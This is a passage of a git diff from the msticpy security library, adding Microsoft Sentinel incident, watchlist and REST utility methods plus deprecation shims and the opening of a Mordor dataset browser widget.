+    def get_incident_alerts(self, incident: str) -> list:
+        """
+        Get the alerts from an incident.
+
+        Parameters
+        ----------
+        incident : str
+            Incident GUID or Name.
+
+        Returns
+        -------
+        list
+            A list of alerts.
+
+        """
+        incident_id = self._get_incident_id(incident)
+        alerts_url = self.sent_urls["incidents"] + f"/{incident_id}/alerts"  # type: ignore
+        alerts_parameters = {"api-version": "2021-04-01"}
+        alerts_resp = httpx.post(
+            alerts_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=alerts_parameters,
+        )
+        return (
+            [
+                {
+                    "ID": alrts["properties"]["systemAlertId"],
+                    "Name": alrts["properties"]["alertDisplayName"],
+                }
+                for alrts in alerts_resp.json()["value"]
+            ]
+            if alerts_resp.status_code == 200
+            else []
+        )
+
+    def get_incident_comments(self, incident: str) -> list:
+        """
+        Get the comments from an incident.
+
+        Parameters
+        ----------
+        incident : str
+            Incident GUID or Name.
+
+        Returns
+        -------
+        list
+            A list of comments.
+
+        """
+        incident_id = self._get_incident_id(incident)
+        comments_url = self.sent_urls["incidents"] + f"/{incident_id}/comments"  # type: ignore
+        comments_response = self._get_items(comments_url, "2021-04-01")  # type: ignore
+        comment_details = comments_response.json()
+        return (
+            [
+                {
+                    "Message": comment["properties"]["message"],
+                    "Author": comment["properties"]["author"]["name"],
+                }
+                for comment in comment_details["value"]
+            ]
+            if comments_response.status_code == 200
+            else []
+        )
+
+    def get_incident_bookmarks(self, incident: str) -> list:
+        """
+        Get the comments from an incident.
+
+        Parameters
+        ----------
+        incident : str
+            Incident GUID or name.
+
+        Returns
+        -------
+        list
+            A list of bookmarks.
+
+        """
+        bookmarks_list = []
+        incident_id = self._get_incident_id(incident)
+        relations_url = self.sent_urls["incidents"] + f"/{incident_id}/relations"  # type: ignore
+        relations_response = self._get_items(relations_url, "2021-04-01")  # type: ignore
+        if relations_response.status_code == 200 and relations_response.json()["value"]:
+            for relationship in relations_response.json()["value"]:
+                if (
+                    relationship["properties"]["relatedResourceType"]
+                    == "Microsoft.SecurityInsights/Bookmarks"
+                ):
+                    bkmark_id = relationship["properties"]["relatedResourceName"]
+                    bookmarks_df = self.list_bookmarks()  # type: ignore
+                    bookmark = bookmarks_df[bookmarks_df["name"] == bkmark_id].iloc[0]
+                    bookmarks_list.append(
+                        {
+                            "Bookmark ID": bkmark_id,
+                            "Bookmark Title": bookmark["properties.displayName"],
+                        }
+                    )
+
+        return bookmarks_list
+
+    def update_incident(
+        self,
+        incident_id: str,
+        update_items: dict,
+    ):
+        """
+        Update properties of an incident.
+
+        Parameters
+        ----------
+        incident_id : str
+            Incident ID GUID.
+        update_items : dict
+            Dictionary of properties to update and their values.
+            Ref: https://docs.microsoft.com/en-us/rest/api/securityinsights/incidents/createorupdate
+
+        Raises
+        ------
+        CloudError
+            If incident could not be updated.
+
+        """
+        incident_dets = self.get_incident(incident_id)
+        incident_url = self.sent_urls["incidents"] + f"/{incident_id}"  # type: ignore
+        params = {"api-version": "2020-01-01"}
+        if "title" not in update_items.keys():
+            update_items["title"] = incident_dets.iloc[0]["properties.title"]
+        if "status" not in update_items.keys():
+            update_items["status"] = incident_dets.iloc[0]["properties.status"]
+        data = _build_sent_data(update_items, etag=incident_dets.iloc[0]["etag"])
+        response = httpx.put(
+            incident_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(data),
+        )
+        if response.status_code != 200:
+            raise CloudError(response=response)
+        print("Incident updated.")
+
+    def create_incident(  # pylint: disable=too-many-arguments, too-many-locals, too-many-branches
+        self,
+        title: str,
+        severity: str,
+        status: str = "New",
+        description: str = None,
+        first_activity_time: datetime = None,
+        last_activity_time: datetime = None,
+        labels: List = None,
+        bookmarks: List = None,
+    ):
+        """
+        Create a Sentinel Incident.
+
+        Parameters
+        ----------
+        title : str
+            The title of the incident to create
+        severity : str
+            The severity to assign the incident, options are:
+               Informational, Low, Medium, High
+        status : str, optional
+            The status to assign the incident, by default "New"
+            Options are: New, Active, Closed
+        description : str, optional
+            A description of the incident, by default None
+        first_activity_time : datetime, optional
+            The start time of the incident activity, by default None
+        last_activity_time : datetime, optional
+            The end time of the incident activity, by default None
+        labels : List, optional
+            Any labels to apply to the incident, by default None
+        bookmarks : List, optional
+            A list of bookmark GUIDS you want to associate with the incident
+
+        Raises
+        ------
+        CloudError
+            If the API returns an error
+
+        """
+        incident_id = uuid4()
+        incident_url = self.sent_urls["incidents"] + f"/{incident_id}"  # type: ignore
+        params = {"api-version": "2020-01-01"}
+        data_items = {
+            "title": title,
+            "severity": severity.capitalize(),
+            "status": status.capitalize(),
+        }  # type: Dict[str, Union[str, List]]
+        if description:
+            data_items["description"] = description
+        if labels:
+            labels = [{"labelName": lab, "labelType": "User"} for lab in labels]
+            data_items["labels"] = labels
+        if first_activity_time:
+            data_items["firstActivityTimeUtc"] = first_activity_time.isoformat()
+        if last_activity_time:
+            data_items["lastActivityTimeUtc"] = last_activity_time.isoformat()
+        data = _build_sent_data(data_items, props=True)
+        response = httpx.put(
+            incident_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(data),
+        )
+        if response.status_code != 201:
+            raise CloudError(response=response)
+        if bookmarks:
+            for mark in bookmarks:
+                relation_id = uuid4()
+                bookmark_id = self._get_bookmark_id(mark)  # type: ignore
+                mark_res_id = self.sent_urls["bookmarks"] + f"/{bookmark_id}"  # type: ignore
+                relations_url = incident_url + f"/relations/{relation_id}"
+                bkmark_data_items = {"relatedResourceId": mark_res_id}
+                data = _build_sent_data(bkmark_data_items, props=True)
+                params = {"api-version": "2021-04-01"}
+                response = httpx.put(
+                    relations_url,
+                    headers=get_api_headers(self.token),  # type: ignore
+                    params=params,
+                    content=str(data),
+                )
+        print("Incident created.")
+
+    def _get_incident_id(self, incident: str) -> str:
+        """
+        Get an incident ID.
+
+        Parameters
+        ----------
+        incident : str
+            An incident identifier
+
+        Returns
+        -------
+        str
+            The Incident GUID
+
+        Raises
+        ------
+        MsticpyUserError
+            If incident can't be found or multiple matching incidents found.
+
+        """
+        try:
+            UUID(incident)
+            return incident
+        except ValueError as incident_name:
+            incidents = self.list_incidents()
+            filtered_incidents = incidents[
+                incidents["properties.title"].str.contains(incident)
+            ]
+            if len(filtered_incidents) > 1:
+                display(filtered_incidents[["name", "properties.title"]])
+                raise MsticpyUserError(
+                    "More than one incident found, please specify by GUID"
+                ) from incident_name
+            if (
+                not isinstance(filtered_incidents, pd.DataFrame)
+                or filtered_incidents.empty
+            ):
+                raise MsticpyUserError(
+                    f"Incident {incident} not found"
+                ) from incident_name
+            return filtered_incidents["name"].iloc[0]
+
+    def post_comment(
+        self,
+        incident_id: str,
+        comment: str,
+    ):
+        """
+        Write a comment for an incident.
+
+        Parameters
+        ----------
+        incident_id : str
+            Incident ID GUID.
+        comment : str
+            Comment message to post.
+
+        Raises
+        ------
+        CloudError
+            If message could not be posted.
+
+        """
+        comment_url = (
+            self.sent_urls["incidents"] + f"/{incident_id}/comments/{uuid4()}"  # type: ignore
+        )
+        params = {"api-version": "2020-01-01"}
+        data = _build_sent_data({"message": comment})
+        response = httpx.put(
+            comment_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(data),
+        )
+        if response.status_code != 201:
+            raise CloudError(response=response)
+        print("Comment posted.")
+
+    def add_bookmark_to_incident(self, incident: str, bookmark: str):
+        """
+        Add a bookmark to an incident.
+
+        Parameters
+        ----------
+        incident : str
+            Either an incident name or an incident GUID
+        bookmark : str
+            Either a bookmark name or bookmark GUID
+
+        Raises
+        ------
+        CloudError
+            If API returns error
+
+        """
+        incident_id = self._get_incident_id(incident)
+        incident_url = self.sent_urls["incidents"] + f"/{incident_id}"  # type: ignore
+        bookmark_id = self._get_bookmark_id(bookmark)  # type: ignore
+        mark_res_id = self.sent_urls["bookmarks"] + f"/{bookmark_id}"  # type: ignore
+        relations_id = uuid4()
+        bookmark_url = incident_url + f"/relations/{relations_id}"
+        bkmark_data_items = {"relatedResourceId": mark_res_id}
+        data = _build_sent_data(bkmark_data_items, props=True)
+        params = {"api-version": "2021-04-01"}
+        response = httpx.put(
+            bookmark_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(data),
+        )
+        if response.status_code != 201:
+            raise CloudError(response=response)
+        print("Bookmark added to incident.")
+
+    def list_incidents(self) -> pd.DataFrame:
+        """
+        Get a list of incident for a Sentinel workspace.
+
+        Returns
+        -------
+        pd.DataFrame
+            A table of incidents.
+
+        Raises
+        ------
+        CloudError
+            If incidents could not be retrieved.
+
+        """
+        return self._list_items(item_type="incidents")  # type: ignore
+
+    get_incidents = list_incidents
diff --git a/msticpy/data/azure/sentinel_utils.py b/msticpy/data/azure/sentinel_utils.py
new file mode 100644
index 000000000..faefb7940
--- /dev/null
+++ b/msticpy/data/azure/sentinel_utils.py
@@ -0,0 +1,273 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mixin Classes for Sentinel Utilties."""
+from collections import Counter
+from typing import Dict, List
+
+import pandas as pd
+import httpx
+
+from azure.common.exceptions import CloudError
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyAzureConfigError
+from ...common.azure_auth_core import AzureCloudConfig
+from ...common.wsconfig import WorkspaceConfig
+from .azure_data import get_api_headers
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+_PATH_MAPPING = {
+    "ops_path": "/providers/Microsoft.SecurityInsights/operations",
+    "alert_rules": "/providers/Microsoft.SecurityInsights/alertRules",
+    "ss_path": "/savedSearches",
+    "bookmarks": "/providers/Microsoft.SecurityInsights/bookmarks",
+    "incidents": "/providers/Microsoft.SecurityInsights/incidents",
+    "data_connectors": "/providers/Microsoft.SecurityInsights/dataConnectors",
+    "watchlists": "/providers/Microsoft.SecurityInsights/watchlists",
+    "alert_template": "/providers/Microsoft.SecurityInsights/alertRuleTemplates",
+}
+
+
+# pylint: disable=too-few-public-methods
+class SentinelUtilsMixin:
+    """Mixin class for Sentinel core feature integrations."""
+
+    def _get_items(self, url: str, params: str = "2020-01-01") -> httpx.Response:
+        """Get items from the API."""
+        return httpx.get(
+            url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params={"api-version": params},
+        )
+
+    def _list_items(
+        self,
+        item_type: str,
+        api_version: str = "2020-01-01",
+        appendix: str = None,
+    ) -> pd.DataFrame:
+        """
+        Return lists of core resources from APIs.
+
+        Parameters
+        ----------
+        item_type : str
+            The type of resource you want to list.
+        api_version: str, optional
+            The API version to use, by default '2020-01-01'
+        appendix: str, optional
+            Any appendix that needs adding to the URI, default is None
+
+        Returns
+        -------
+        pd.DataFrame
+            A DataFrame containing the requested items.
+
+        Raises
+        ------
+        CloudError
+            If a valid result is not returned.
+
+        """
+        item_url = self.url + _PATH_MAPPING[item_type]  # type: ignore
+        if appendix:
+            item_url = item_url + appendix
+        response = self._get_items(item_url, api_version)
+        if response.status_code == 200:
+            results_df = _azs_api_result_to_df(response)
+        else:
+            raise CloudError(response=response)
+        return results_df
+
+    def _check_config(self, items: List) -> Dict:
+        """
+        Get parameters from default config files.
+
+        Parameters
+        ----------
+        items : List
+            The items to get from the config.
+
+        Returns
+        -------
+        Dict
+            The config items.
+
+        """
+        config_items = {}
+        if not self.config:  # type: ignore
+            self.config = WorkspaceConfig()  # type: ignore
+        for item in items:
+            if item in self.config:  # type: ignore
+                config_items[item] = self.config[item]  # type: ignore
+            else:
+                raise MsticpyAzureConfigError(f"No {item} avaliable in config.")
+
+        return config_items
+
+    def _build_sent_res_id(
+        self, sub_id: str = None, res_grp: str = None, ws_name: str = None
+    ) -> str:
+        """
+        Build a resource ID.
+
+        Parameters
+        ----------
+        sub_id : str, optional
+            Subscription ID to use, by default None
+        res_grp : str, optional
+            Resource Group name to use, by default None
+        ws_name : str, optional
+            Workspace name to user, by default None
+
+        Returns
+        -------
+        str
+            The formatted resource ID.
+
+        """
+        if not sub_id or not res_grp or not ws_name:
+            config = self._check_config(
+                ["subscription_id", "resource_group", "workspace_name"]
+            )
+            sub_id = config["subscription_id"]
+            res_grp = config["resource_group"]
+            ws_name = config["workspace_name"]
+        return "".join(
+            [
+                f"/subscriptions/{sub_id}/resourcegroups/{res_grp}",
+                f"/providers/Microsoft.OperationalInsights/workspaces/{ws_name}",
+            ]
+        )
+
+    def _build_sent_paths(self, res_id: str, base_url: str = None) -> str:
+        """
+        Build an API URL from an Azure resource ID.
+
+        Parameters
+        ----------
+        res_id : str
+            An Azure resource ID.
+        base_url : str, optional
+            The base URL of the Azure cloud to connect to.
+            Defaults to resource manager for configured cloud.
+            If no cloud configuration, defaults to resource manager
+            endpoint for public cloud.
+
+        Returns
+        -------
+        str
+            A URI to that resource.
+
+        """
+        if not base_url:
+            base_url = AzureCloudConfig(self.cloud).endpoints.resource_manager  # type: ignore
+        res_info = {
+            "subscription_id": res_id.split("/")[2],
+            "resource_group": res_id.split("/")[4],
+            "workspace_name": res_id.split("/")[-1],
+        }
+
+        return "".join(
+            [
+                f"{base_url}/subscriptions/{res_info['subscription_id']}",
+                f"/resourceGroups/{res_info['resource_group']}",
+                "/providers/Microsoft.OperationalInsights/workspaces"
+                f"/{res_info['workspace_name']}",
+            ]
+        )
+
+
+def _azs_api_result_to_df(response: httpx.Response) -> pd.DataFrame:
+    """
+    Convert API response to a Pandas dataframe.
+
+    Parameters
+    ----------
+    response : httpx.Response
+        A response object from an Azure REST API call.
+
+    Returns
+    -------
+    pd.DataFrame
+        The API response as a Pandas dataframe.
+
+    Raises
+    ------
+    ValueError
+        If the response is not valid JSON.
+
+    """
+    j_resp = response.json()
+    if response.status_code != 200 or not j_resp:
+        raise ValueError("No valid JSON result in response")
+    if "value" in j_resp:
+        j_resp = j_resp["value"]
+    return pd.json_normalize(j_resp)
+
+
+def _build_sent_data(items: dict, props: bool = False, **kwargs) -> dict:
+    """
+    Build request data body from items.
+
+    Parameters
+    ----------
+    items : dict
+        A set pf items to be formated in the request body.
+    props: bool, optional
+        Whether all items are to be built as properities. Default is false.
+
+    Returns
+    -------
+    dict
+        The request body formatted for the API.
+
+    """
+    data_body = {"properties": {}}  # type: Dict[str, Dict[str, str]]
+    for key, _ in items.items():
+        if key in ["severity", "status", "title", "message"] or props:
+            data_body["properties"].update({key: items[key]})  # type:ignore
+        else:
+            data_body[key] = items[key]
+    if "etag" in kwargs:
+        data_body["etag"] = kwargs.get("etag")  # type:ignore
+    return data_body
+
+
+def validate_res_id(res_id):
+    """Validate a Resource ID String and fix if needed."""
+    valid = _validator(res_id)
+    if not valid:
+        res_id = _fix_res_id(res_id)
+        valid = _validator(res_id)
+    if not valid:
+        raise MsticpyAzureConfigError("The Resource ID provided is not valid.")
+
+    return res_id
+
+
+def _validator(res_id):
+    """Check Resource ID string matches pattern expected."""
+    counts = Counter(res_id)
+    return bool(
+        res_id.startswith("/") and counts["/"] == 8 and not res_id.endswith("/")
+    )
+
+
+def _fix_res_id(res_id):
+    """Try to fix common issues with Resource ID string."""
+    if res_id.startswith("https:"):
+        res_id = "/".join(res_id.split("/")[5:])
+    if not res_id.startswith("/"):
+        res_id = "/" + res_id
+    if res_id.endswith("/"):
+        res_id = res_id[:-1]
+    counts = Counter(res_id)
+    if counts["/"] > 8:
+        res_id = "/".join(res_id.split("/")[:9])
+    return res_id
diff --git a/msticpy/data/azure/sentinel_watchlists.py b/msticpy/data/azure/sentinel_watchlists.py
new file mode 100644
index 000000000..cb6a80814
--- /dev/null
+++ b/msticpy/data/azure/sentinel_watchlists.py
@@ -0,0 +1,282 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mixin Classes for Sentinel Watchlist Features."""
+from typing import Dict, Union
+from uuid import uuid4
+
+import pandas as pd
+import httpx
+
+from azure.common.exceptions import CloudError
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyUserError
+from .azure_data import get_api_headers
+from .sentinel_utils import _build_sent_data
+
+__version__ = VERSION
+__author__ = "Pete Bryan"
+
+
+class SentinelWatchlistsMixin:
+    """Mixin class for Sentinel Watchlist feature integrations."""
+
+    def list_watchlists(self) -> pd.DataFrame:
+        """
+        List Deployed Watchlists.
+
+        Returns
+        -------
+        pd.DataFrame
+            A DataFrame containing the watchlists
+
+        Raises
+        ------
+        CloudError
+            If a valid result is not returned.
+
+        """
+        return self._list_items(  # type: ignore
+            item_type="watchlists",
+            api_version="2021-04-01",
+        )
+
+    def create_watchlist(
+        self,
+        watchlist_name: str,
+        description: str,
+        search_key: str,
+        provider: str = "MSTICPy",
+        source: str = "Notebook",
+        data: pd.DataFrame = None,
+    ):
+        """
+        Create a new watchlist.
+
+        Parameters
+        ----------
+        watchlist_name : str
+            The name of the watchlist you want to create,
+            this can't be the name of an existing watchlist.
+        description : str
+            A description of the watchlist to be created.
+        search_key : str
+            The search key is used to optimize query performance when using watchlists
+            for joins with other data.
+            This should be the key column that will be used in the watchlist when joining
+            to other data tables.
+        provider : str, optional
+            This is the label attached to the watchlist showing who created it, by default "MSTICPy"
+        source : str, optional
+            The source of the data to be put in the watchlist, by default "Notebook"
+        data: pd.DataFrame, optional
+            The data you want to upload to the watchlist
+
+        Raises
+        ------
+        MsticpyUserError
+            Raised if the watchlist name already exists.
+        CloudError
+            If there is an issue creating the watchlist.
+
+        """
+        if self._check_watchlist_exists(watchlist_name):
+            raise MsticpyUserError(f"Watchlist {watchlist_name} already exist.")
+        watchlist_url = self.sent_urls["watchlists"] + f"/{watchlist_name}"  # type: ignore
+        params = {"api-version": "2021-04-01"}
+        data_items = {
+            "displayName": watchlist_name,
+            "source": source,
+            "provider": provider,
+            "description": description,
+            "itemsSearchKey": search_key,
+            "contentType": "text/csv",
+        }  # type: Dict[str, str]
+        if isinstance(data, pd.DataFrame) and not data.empty:
+            data_csv = data.to_csv(index=False)
+            data_items["rawContent"] = str(data_csv)
+        request_data = _build_sent_data(data_items, props=True)
+        response = httpx.put(
+            watchlist_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+            content=str(request_data),
+        )
+        if response.status_code != 200:
+            raise CloudError(response=response)
+
+        print("Watchlist created.")
+
+    def list_watchlist_items(
+        self,
+        watchlist_name: str,
+    ) -> pd.DataFrame:
+        """
+        List items in a watchlist.
+
+        Parameters
+        ----------
+        watchlist_name : str
+            The name of the watchlist to get items from
+
+        Returns
+        -------
+        pd.DataFrame
+            A DataFrame containing the watchlists
+
+        Raises
+        ------
+        CloudError
+            If a valid result is not returned.
+
+        """
+        watchlist_name_str = f"/{watchlist_name}/watchlistItems"
+        return self._list_items(  # type: ignore
+            item_type="watchlists",
+            api_version="2021-04-01",
+            appendix=watchlist_name_str,
+        )
+
+    def add_watchlist_item(
+        self,
+        watchlist_name: str,
+        item: Union[Dict, pd.Series, pd.DataFrame],
+        overwrite: bool = False,
+    ):
+        """
+        Add or update an item in a Watchlist.
+
+        Parameters
+        ----------
+        watchlist_name : str
+            The name of the watchlist to add items to
+        item : Union[Dict, pd.Series, pd.DataFrame]
+            The item to add, this can be a dictionary of valies, a Pandas Series, or DataFrame
+        overwrite : bool, optional
+            Wether you want to overwrite an item if it already exists in the watchlist,
+            by default False
+
+        Raises
+        ------
+        MsticpyUserError
+            If the specified Watchlist does not exist.
+        MsticpyUserError
+            If the item already exists in the Watchlist and overwrite is set to False
+        CloudError
+            If the API returns an error.
+
+        """
+        # Check requested watchlist actually exists
+        if not self._check_watchlist_exists(watchlist_name):
+            raise MsticpyUserError(f"Watchlist {watchlist_name} does not exist.")
+
+        new_items = []
+        # Convert items to add to dictionary format
+        if isinstance(item, pd.Series):
+            new_items = [dict(item)]
+        elif isinstance(item, Dict):
+            new_items = [item]
+        elif isinstance(item, pd.DataFrame):
+            for _, line_item in item.iterrows():
+                new_items.append(dict(line_item))
+
+        current_items = self.list_watchlist_items(watchlist_name)
+        current_items_values = current_items.filter(
+            regex="^properties.itemsKeyValue.", axis=1
+        )
+        current_items_values.columns = current_items_values.columns.str.replace(
+            "properties.itemsKeyValue.", "", regex=False
+        )
+
+        for new_item in new_items:
+            # See if item already exists, if it does get the item ID
+            current_df, item_series = current_items_values.align(
+                pd.Series(new_item), axis=1, copy=False  # type: ignore
+            )
+            if (current_df == item_series).all(axis=1).any() and overwrite:
+                watchlist_id = current_items[
+                    current_items.isin(list(new_item.values())).any(axis=1)
+                ]["properties.watchlistItemId"].iloc[0]
+            # If not in watchlist already generate new ID
+            elif not (current_df == item_series).all(axis=1).any():
+                watchlist_id = str(uuid4())
+            else:
+                raise MsticpyUserError(
+                    "Item already exists in the watchlist. Set overwrite = True to replace."
+                )
+
+            watchlist_url = (
+                self.sent_urls["watchlists"]  # type: ignore
+                + f"/{watchlist_name}/watchlistItems/{watchlist_id}"
+            )
+            response = httpx.put(
+                watchlist_url,
+                headers=get_api_headers(self.token),  # type: ignore
+                params={"api-version": "2021-04-01"},
+                content=str({"properties": {"itemsKeyValue": item}}),
+            )
+            if response.status_code != 200:
+                raise CloudError(response=response)
+
+        print(f"Items added to {watchlist_name}")
+
+    def delete_watchlist(
+        self,
+        watchlist_name: str,
+    ):
+        """
+        Delete a selected Watchlist.
+
+        Parameters
+        ----------
+        watchlist_name : str
+            The name of the Watchlist to deleted
+
+        Raises
+        ------
+        MsticpyUserError
+            If Watchlist does not exist.
+        CloudError
+            If the API returns an error.
+
+        """
+        # Check requested watchlist actually exists
+        if not self._check_watchlist_exists(watchlist_name):
+            raise MsticpyUserError(f"Watchlist {watchlist_name} does not exist.")
+        watchlist_url = self.sent_urls["watchlists"] + f"/{watchlist_name}"  # type: ignore
+        params = {"api-version": "2021-04-01"}
+        response = httpx.delete(
+            watchlist_url,
+            headers=get_api_headers(self.token),  # type: ignore
+            params=params,
+        )
+        if response.status_code != 200:
+            raise CloudError(response=response)
+        print(f"Watchlist {watchlist_name} deleted")
+
+    def _check_watchlist_exists(
+        self,
+        watchlist_name: str,
+    ):
+        """
+        Check whether a Watchlist exists or not.
+
+        Parameters
+        ----------
+        watchlist_name : str
+            The Watchlist to check for.
+        res_id : str, optional
+            The Resource ID of the Sentinel workspace to check in, by default None
+
+        Returns
+        -------
+        bool
+            Whether the Watchlist exists or not.
+
+        """
+        # Check requested watchlist actually exists
+        existing_watchlists = self.list_watchlists()["name"].values
+        return watchlist_name in existing_watchlists
diff --git a/msticpy/data/azure_blob_storage.py b/msticpy/data/azure_blob_storage.py
new file mode 100644
index 000000000..3701bc6dd
--- /dev/null
+++ b/msticpy/data/azure_blob_storage.py
@@ -0,0 +1,17 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Deprecated path for data.azure."""
+import warnings
+
+# flake8: noqa: F403, F401
+# pylint: disable=unused-import
+from .azure.azure_blob_storage import AzureBlobStorage
+
+WARN_MSSG = (
+    "This module has moved to msticpy.data.azure.azure_blob_storage\n"
+    + "Please change your import to reflect this new location."
+)
+warnings.warn(WARN_MSSG, category=DeprecationWarning)
diff --git a/msticpy/data/azure_data.py b/msticpy/data/azure_data.py
new file mode 100644
index 000000000..c4c90f035
--- /dev/null
+++ b/msticpy/data/azure_data.py
@@ -0,0 +1,17 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Deprecated path for data.azure."""
+import warnings
+
+# flake8: noqa: F403, F401
+# pylint: disable=unused-import
+from .azure import AzureData
+
+WARN_MSSG = (
+    "This module has moved to msticpy.data.azure.azure_data\n"
+    + "Please change your import to reflect this new location."
+)
+warnings.warn(WARN_MSSG, category=DeprecationWarning)
diff --git a/msticpy/data/azure_sentinel.py b/msticpy/data/azure_sentinel.py
new file mode 100644
index 000000000..cd78e6956
--- /dev/null
+++ b/msticpy/data/azure_sentinel.py
@@ -0,0 +1,17 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Deprecated path for data.azure."""
+import warnings
+
+# flake8: noqa: F403, F401
+# pylint: disable=unused-import
+from .azure import MicrosoftSentinel as AzureSentinel
+
+WARN_MSSG = (
+    "This module has moved to msticpy.data.azure.sentinel_core\n"
+    + "Please change your import to reflect this new location."
+)
+warnings.warn(WARN_MSSG, category=DeprecationWarning)
diff --git a/msticpy/data/browsers/__init__.py b/msticpy/data/browsers/__init__.py
new file mode 100644
index 000000000..3c365448f
--- /dev/null
+++ b/msticpy/data/browsers/__init__.py
@@ -0,0 +1 @@
+"""Data browsers sub-package."""
diff --git a/msticpy/data/browsers/mordor_browser.py b/msticpy/data/browsers/mordor_browser.py
new file mode 100644
index 000000000..6ec84ca60
--- /dev/null
+++ b/msticpy/data/browsers/mordor_browser.py
@@ -0,0 +1,398 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Morder dataset browser."""
+from pprint import pformat
+from typing import Any, Dict, Iterable
+
+import ipywidgets as widgets
+import pandas as pd
+from IPython.display import display, HTML
+
+from ..._version import VERSION
+from ...common.exceptions import MsticpyException
+from ..drivers.mordor_driver import (
+    MordorDriver,
+    MordorEntry,
+    download_mdr_file,
+    search_mdr_data,
+)
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+class MordorBrowser:
+    """Mordor browser widget."""
+
+    def __init__(self, save_folder: str = ".", use_cached: bool = True):
+        """
+        Initialize MordorBrowser control.
+
+        Parameters
+        ----------
+        save_folder : str, optional
+            Folder to save downloaded files, by default "."
+        use_cached : bool, optional
+            If true, downloaded files are not deleted after
+            download and are used as a local cache, by default True
+
+        """
+        self._save_folder = save_folder
+        self._use_cached = use_cached
+        self.mordor_driver = MordorDriver()
+        self.mordor_driver.connect()
+        self.mdr_metadata = self.mordor_driver.mordor_data
+        self._df_disp = None
+
+        self.layouts = self._create_layouts()
+        self.w_style = {
+            "description_width": "150px",
+            "font_family": "arial, sans-serif",
+        }
+
+        self.widgets: Dict[str, Any] = {}
+        self._init_field_ctls()
+        self._init_select_dataset()
+        self._init_filter_ctrls()
+
+        wgt_title = widgets.HTML(
+            value="<h2>Mordor dataset browser</h2>", style={"fontsize": "x-large"}
+        )
+
+        browse_ctrls = widgets.VBox(
+            [wgt_title, self.widgets["ds_select"], self.widgets["filter_grp"]],
+            layout=self.layouts["box_layout"],
+        )
+        fields_ctrls = widgets.VBox(
+            list(self.fields.values()), layout=self.layouts["box_layout"]
+        )
+
+        self.datasets: Dict[str, pd.DataFrame] = {}
+        self.current_dataset: pd.DataFrame = None
+        display(widgets.VBox([browse_ctrls, fields_ctrls]))
+        self._df_disp = display(HTML("<p>"), display_id=True)
+
+    @property
+    def fields(self):
+        """Return set of fields widget controls."""
+        return self.widgets["fields"]
+
+    @property
+    def selected_dset(self):
+        """Return the ID of the selected data set."""
+        return self.widgets["ds_select"].value
+
+    def _clear_df_display(self):
+        if self._df_disp:
+            self._df_disp.update(HTML("<p>"))
+
+    @staticmethod
+    def _create_layouts():
+        """Set up the widget layouts."""
+        return {
+            "layout_norm": widgets.Layout(width="70%"),
+            "layout_high": widgets.Layout(width="70%", height="200px"),
+            "box_layout": widgets.Layout(
+                width="80%", border="1px solid", margin="5px", padding="10px"
+            ),
+            "mitre_select_layout": widgets.Layout(width="40%", height="100px"),
+        }
+
+    def _init_filter_ctrls(self):
+        """Initialize the filter controls."""
+        # text_filter
+        self.widgets["filter_text"] = widgets.Text(
+            description="Filter", layout=self.layouts["layout_norm"], style=self.w_style
+        )
+        self.widgets["filter_text"].continuous_update = False
+        self.widgets["filter_text"].observe(self._update_select_list, "value")
+        self.widgets["filter_help"] = widgets.Label(
+            value=" comma ORs values, '+' ANDs values"
+        )
+
+        # Mitre filters
+        self.widgets["sel_techniques"] = widgets.SelectMultiple(
+            description="Mitre Techniques",
+            options=self._get_mitre_filter_options(
+                self.mordor_driver.mdr_idx_tech, self.mordor_driver.mitre_techniques
+            ),
+            layout=self.layouts["mitre_select_layout"],
+            style=self.w_style,
+        )
+
+        self.widgets["sel_tactics"] = widgets.SelectMultiple(
+            description="Mitre Tactics",
+            options=self._get_mitre_filter_options(
+                self.mordor_driver.mdr_idx_tact, self.mordor_driver.mitre_tactics
+            ),
+            layout=self.layouts["mitre_select_layout"],
+            style=self.w_style,
+        )
+        self._reset_filters()
+        self.widgets["sel_techniques"].observe(self._update_select_list, names="value")
+        self.widgets["sel_tactics"].observe(self._update_select_list, names="value")
+
+        self.widgets["filter_reset"] = widgets.Button(description="Reset filter")
+        self.widgets["filter_reset"].on_click(self._reset_filters)
+        wgt_filter_grp = widgets.VBox(
+            [
+                widgets.HBox(
+                    [self.widgets["filter_text"], self.widgets["filter_help"]]
+                ),
+                widgets.HBox(
+                    [
+                        self.widgets["sel_techniques"],
+                        self.widgets["sel_tactics"],
+                        self.widgets["filter_reset"],
+                    ]
+                ),
+            ]
+        )
+        self.widgets["filter_grp"] = widgets.Accordion(children=[wgt_filter_grp])
+        self.widgets["filter_grp"].set_title(0, "Filters")
+        self.widgets["filter_grp"].selected_index = None
+
+    def _init_select_dataset(self):
+        """Initialize the select dataset control."""
+        ds_select = widgets.Select(
+            description="Data sets",
+            options=self._get_md_select_options(),
+            layout=self.layouts["layout_norm"],
+            style=self.w_style,
+        )
